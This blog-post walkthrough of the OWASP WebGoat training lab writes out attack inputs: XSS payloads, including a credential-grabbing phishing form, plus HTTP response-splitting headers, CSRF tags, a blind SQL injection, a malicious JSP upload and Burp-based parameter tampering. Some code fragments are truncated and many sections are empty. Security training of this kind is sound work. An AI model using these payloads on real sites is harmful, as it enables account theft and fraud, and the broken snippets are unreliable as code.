Wednesday, July 18, 2018

WebGoat WalkThrough

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OWASP WebGoat:-

First, Run webgoat
If you are using virtual machine .ova file, then open that I.P. Which is provided by the virtual machine
e.g:- URL: ( It can be change in your case )


    Http Basics
        This tutorial will show you that how Http Reverse function Work.
        Enter any name in input field then result will show in input field reverse.
        E.g: Aryan = nayrA
    HTTP Splitting
        This Tutorial divided in 2 stage.

        Encode the code given below:-
        Click on it. [encodeURIComponent]
        After encode the code put it in input field. then click on 'SEARCH' button.
        Stage 1: HTTP Splitting

        Content-Length: 0
        HTTP/1.1 200 OK
        Content-Type: text/html
        Content-Length: 31
        <html>White Hat Aryan</html>

        Stage 2: Cache Poisoning:-
        Content-Length: 0
        HTTP/1.1 200 OK
        Content-Type: text/html
        Last-Modified: Mon, 15 Oct 2222 15:27:28 GMT
        Content-Length: 31
        <html>White Hate Aryan: Cache Poisoning Done</html>
Access Control Flaws
    Using an Access Control Matrix
        In this tutorial you have to explore every user and you have to find that who is 'Account Manager'
        Select user:- Larry
        Select resource:- Account Manager
    Bypass a Path Based Access Control Scheme
        Select any file from select input and open Inspect Element and change the
        value="../../reportBug.jsp" the click view file.

    LAB: Role Based Access Control
        Stage 1: Bypass Business Layer Access Control
             Login with Tom Password is 'tom'
             Then open burp suite and start intercept and click on view
             See in burp suite and change 'action=ViewProfile' to action=DeleteProfile.

        Stage 2: Add Business Layer Access Control
             This is developer viersion

        Stage 3: Bypass Data Layer Access Control
             Login with Tom Password is 'tom' then click on 'Search Staff' then type any other name
             like Moe password is 'moe' then click on Edit Profile and change the content of profile
             in any field and click 'Update Profile'.

        Stage 4: Add Data Layer Access Control
             This is Developer version
    Remote Admin Access
AJAX Security

    Same Origin Policy Protection
        Click one by one at the bottom's link.

        Click here to try a Same Origin request:
        Click here to try a Different Origin request:

    LAB: DOM-Based cross-site scripting
        STAGE:1 - copy the image location link. which is showing by name 'Location: OWASP IMAGE'
              and type a html image tag. e.g- <img src="images/logos/owasp.jpg"/>
        STAGE:2 - <img src="abc" onerror="alert('done')"/>
        STAGE:3 - <iframe src="javascript:alert("done")"></iframe>
        STAGE:4 - Copy the fake login page. and paste in input field. then enter any password in input field.
        STAGE:5 -
    LAB: Client Side Filtering
        STAGE:1 - Right click on select user:[Choose Employee] field. then click on inspect element.
              Then find hidden table 'hiddenEmployeeRecords', Then  Expand html tables.
              >table >div >table >tbody >tr. find the 'Neville' Sallary
              Sallary 450000
              Then answer the quistion Neville salary 450000 then click Submit Answer
        STAGE:2 -

    DOM Injection
        Right click on 'Acivate!'. Then delete disabled="" then click on Activate! button.

    XML Injection
        Enter account ID: 836239 in input field, some rewards will show bellow, Right click on any reward and

    JSON Injection
        In this tutorial you have to buy NON STOP Ticket. there are two tickets available
        1 is NON STOP   $600
        2 is TWO STOPS  $300
        Now you have to buy NON STOP ticket in cheaper price.
        Right click on $600 then change the price $600 to $300 then click on 'SUBMIT' button.

    Silent Transactions Attacks
        Enter this javascript code in url box and press enter.

    Dangerous Use of Eval
        Enter this code in input 'Enter your three digit access code:'

    Insecure Client Storage

        STAGE:1 - Right click anywhere on your browser and open source code and find 'javascript/clientSideValidation.js'
              Then click javascript/clientSideValidation.js to open.
              Once open clientSideValidation.js file you will see some "coupons", and some function are running
              in this file
              Like:- isValidCoupon(coupon) and decrypt(code).
              The coupons are in encrypted value you have to decrypt any coupon with 'decrypt(code)' function
              which is running on
              clientSideValidation.js file.
              Enter this code on url box
              Then it will show you Decrypt value of 'emph' coupon, which GOLD.
              Enter GOLD in input field "Enter your coupon code" then click [Purchase]
        STAGE:2 - Enter Quantity of all the products, Now you have to change value of total amount.
              Right click on Total amount value Like '$998.98' and change the value $998.98 to $0 then click Purchase.

Authentication Flaws

    Password Strength
        This tutorial will show you that, if you break a password, so How much time would you need to break that password
        Copy all the password one by one and check the password strength, by google.
        e.g.:-  123456 = 1 second
            abzfez = 1 second
            a9z1ez = Some Minuts
            aB8fEz = Some hours
            z8!E?7 = Some days
        It's Depend on your device performance.

    Forgot Password
        You have to reset admin's password
        Enter user name = 'admin' and answer the secret quistion
        What is your fav color?
        Now you have to Brute Force on it using burp suite or you can try multiple login
        Majorly, we have seven colors, so do brute force on it using burp suite
        Answer is 'green'.
    Basic Authentication
        What is the name of the authentication header: = Authorization
        What is the decoded value of the authentication header: = root:owaspbwa or webgoat:webgoat

    Multi Level Login 2
        Login as Joe password is banana, then start Intercept using burp suite Enter TAN #1 15161
        Then change hidden_user=Joe to hidden_user=Jane and click Forword.

    Multi Level Login 1
        STAGE:1 - Login as Jane password is tarzan.
        STAGE:2 - Logout the session and again Login With Jane password is tarzan, Now start intercept,
              and Enter TAN #2 15648 then change hidden_tan=2 to  hidden_tan=1 in burp suite and click forward.

Buffer Overflows

    Off-by-One Overflows
        Type any name in First name and Last name and Enter approx 4100 characters in Room No. Field then click submit
        Then it will show you Available Price Plans: simply click on Accept Terms. Done!
Code Quality

    Discover Clues in the HTML
        Right click on anywhere on your browser then open source code then you have to find some credentials
        like user name and password
        Deveploper keep some credentials in html via comment,
        <!-- FIXME admin:adminpw  --><!-- Use Admin to regenerate database  -->
        Enter the user name and password then click Login.


    Thread Safety Problems
        In this tutorilal you have to use two browser, open two browser and open concurrency Thread safety Problems
        in both browser, Now in first browser Enter user name 'jeff' and Enter 'dave' user name in second browser,
        Now you have to click Submit of both browser at the same time.
    Shopping Cart Concurrency Flaw
        In first browser Enter Quantity 1 in 1st first feild which is $169 and click Update Cart then click Purchase
        fter clicked Purchase, In second browser Enter Quantity 1 in Third field Which is $1799 then click Update Cart
        Now in first browser click confirm.

Cross-Site Scripting (XSS)

    Phishing with XSS
        Put The Form given in below in input field and click search.
        After this a login and password form will show in below search-bar.
        Enter user name and password and click submit, when click on submit button a function called hack()
        name run and will show a popup, your login credentials show in alert popup.
            function hack(){
                + "Password="+document.forms[0].pass.value);
                XSSImage=new Image;
          <H3>This feature requires account login:</H3>
          Enter Username:<br><input type="text" id="user" name="user"><br>
          Enter Password:<br><input type="password" name="pass"><br>
          <input type="submit" name="login" value="login" onclick="hack()">

    LAB: Cross Site Scripting
        Stage 1: Stored XSS
            Login as TOM and click on ViewProfile then click on EditProfile.
            Put the java script alert code '<script>alert("Hacked by WhiteHatAryan");</script> in Street Field and click on UpdateProfile, when will click on UpdateProfile a alert function run.
            After this logout your profile and login with 'jerry' profile, then click ViewProfile, if again alert function will call that means jerry effected by stored xss attack.
        Stage 2: Block Stored XSS using Input Validation
            For Developer
        Stage 3: Stored XSS Revisited
            Login with bruce and click on ViewProfile.
        Stage 4: Block Stored XSS using Output Encoding
            For Developer
        Stage 5: Reflected XSS
            Login with 'Larry', click on SearchStaff then Enter javascript code.
            <script>alert("Hacked by WhiteHatAryan");</script>
        Stage 6: Block Reflected XSS
            For Developer
    Stored XSS Attacks
        Put the title anything, and Enter '<script>alert("Hacked by WhiteHatAryan");</script>' in message field then click on submit, Title will show in message list as link, click on it and if alert function will call its mean that is effected by stored xss attack.
    Reflected XSS Attacks
        Enter java scirpt code, in 'Enter your three digit access code:'
        <script>alert("Hacked by WhiteHatAryan");</script>
    Cross Site Request Forgery (CSRF)
        Enter any title in title field, then enter the code in message field and click submit, code given below.
        <img src="" width="1" height="1" />
        or if it's not working, then you can use this by url.
    CSRF Prompt By-Pass
        Enter any title in title field, then enter the code in message field and click submit, code given below.
        <img src="" width="1" height="1" />
        or if it's not working, then you can use this by url.

    CSRF Token By-Pass
    HTTPOnly Test
    Cross Site Tracing (XST) Attacks

Improper Error Handling

    Fail Open Authentication Scheme

Injection Flaws

    Command Injection
    Numeric SQL Injection
    Log Spoofing
    XPATH Injection
    String SQL Injection
    LAB: SQL Injection
        Stage 1: String SQL Injection
        Stage 2: Parameterized Query #1
        Stage 3: Numeric SQL Injection
        Stage 4: Parameterized Query #2
    Modify Data with SQL Injection
    Add Data with SQL Injection
    Database Backdoors
    Blind Numeric SQL Injection
        101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 1000 );

    Blind String SQL Injection

Denial of Service

    Denial of Service from Multiple Logins

Insecure Communication

    Insecure Login

Insecure Configuration

    Forced Browsing

Insecure Storage

    Encoding Basics

Malicious Execution

    Malicious File Execution

        First save the code in .jsp file extention.
        <HTML> <% file = new"/var/lib/tomcat6/webapps/WebGoat/mfe_target/root.txt"); file.createNewFile(); %> </HTML>
        Now click Browse and select the .jsp file which you saved like- (hack.jsp).
        Then click start upload, then right click on your current image and copy the image link
        open a new tab in your browser and enter the link and hit enter then refresh your webgoat's tab.

Parameter Tampering

    Bypass HTML Field Restrictions
        first right click on 'Disabled input field' then click on inspect element and Delete the disabled="" in input field.
        After this open Burp suite and start intercept, then enter any word in disabled input field then click submit
        then change the all values in Burp suite.
        e.g.- select=foo&radio=foo&checkbox=on&shortinput=12345&disabledinput=disabled+any+word&SUBMIT=Submit TO

    Exploit Hidden Fields
       Start Burp suite and do intercept, click on Purchase and change the Price in burp suite.

Exploit Unchecked Email
        1- Enter the javascript alert code in comment box, <script>alert('White hat aryan');</script>
        2- Start burp suite and do intercept, then enter the javascript code in comment box, <script>alert('White hat aryan');</script> , and change admin to guest.

Bypass Client Side JavaScript Validation

Session Management Flaws

    Hijack a Session
    Spoof an Authentication Cookie
    Session Fixation

Web Services

    Create a SOAP Request
    WSDL Scanning
    Web Service SAX Injection
    Web Service SQL Injection

Admin Functions

    Report Card
    Summary Report Card
    Refresh Database
    User Information
    Product Information
    Adhoc Query




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